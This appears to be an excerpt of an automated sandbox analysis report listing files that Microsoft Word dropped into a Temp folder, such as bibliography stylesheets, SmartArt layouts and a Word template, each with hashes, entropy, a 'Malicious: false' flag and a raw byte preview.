                                                Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                C:\Users\user\AppData\Local\Temp\TCDF0E2.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):288
                                                Entropy (8bit):3.523917709458511
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF0E2.tmp\chicago.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):296658
                                                Entropy (8bit):5.000002997029767
                                                Encrypted:false
                                                SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Local\Temp\TCDF0F3.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):332
                                                Entropy (8bit):3.4871192480632223
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF0F3.tmp\mlaseventheditionofficeonline.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):254875
                                                Entropy (8bit):5.003842588822783
                                                Encrypted:false
                                                SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                MD5:377B3E355414466F3E3861BCE1844976
                                                SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                C:\Users\user\AppData\Local\Temp\TCDF104.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):262
                                                Entropy (8bit):3.4901887319218092
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                MD5:52BD0762F3DC77334807DDFC60D5F304
                                                SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF104.tmp\RadialPictureList.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):5596
                                                Entropy (8bit):7.875182123405584
                                                Encrypted:false
                                                SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                MD5:CDC1493350011DB9892100E94D5592FE
                                                SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                Malicious:false
                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                C:\Users\user\AppData\Local\Temp\TCDF105.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):246
                                                Entropy (8bit):3.5039994158393686
                                                Encrypted:false
                                                SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                MD5:16711B951E1130126E240A6E4CC2E382
                                                SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF105.tmp\TabbedArc.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):3683
                                                Entropy (8bit):7.772039166640107
                                                Encrypted:false
                                                SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                Malicious:false
                                                Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                C:\Users\user\AppData\Local\Temp\TCDF116.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):238
                                                Entropy (8bit):3.472155835869843
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF116.tmp\rings.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):5151
                                                Entropy (8bit):7.859615916913808
                                                Encrypted:false
                                                SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                Malicious:false
                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                C:\Users\user\AppData\Local\Temp\TCDF136.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):374
                                                Entropy (8bit):3.5414485333689694
                                                Encrypted:false
                                                SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                MD5:2F7A8FE4E5046175500AFFA228F99576
                                                SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF136.tmp\Text Sidebar (Annual Report Red and Black design).docx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Word 2007+
                                                Category:dropped
                                                Size (bytes):47296
                                                Entropy (8bit):6.42327948041841
                                                Encrypted:false
                                                SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                Malicious:false
                                                Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                C:\Users\user\AppData\Local\Temp\TCDF137.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):260
                                                Entropy (8bit):3.4895685222798054
                                                Encrypted:false
                                                SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF137.tmp\VaryingWidthList.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):3075
                                                Entropy (8bit):7.716021191059687
                                                Encrypted:false
                                                SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                Malicious:false
                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                C:\Users\user\AppData\Local\Temp\TCDF148.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):260
                                                Entropy (8bit):3.494357416502254
                                                Encrypted:false
                                                SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF148.tmp\ThemePictureGrid.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):6193
                                                Entropy (8bit):7.855499268199703
                                                Encrypted:false
                                                SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                Malicious:false
                                                Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                C:\Users\user\AppData\Local\Temp\TCDF16A.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):256
                                                Entropy (8bit):3.464918006641019
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                MD5:93149E194021B37162FD86684ED22401
                                                SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
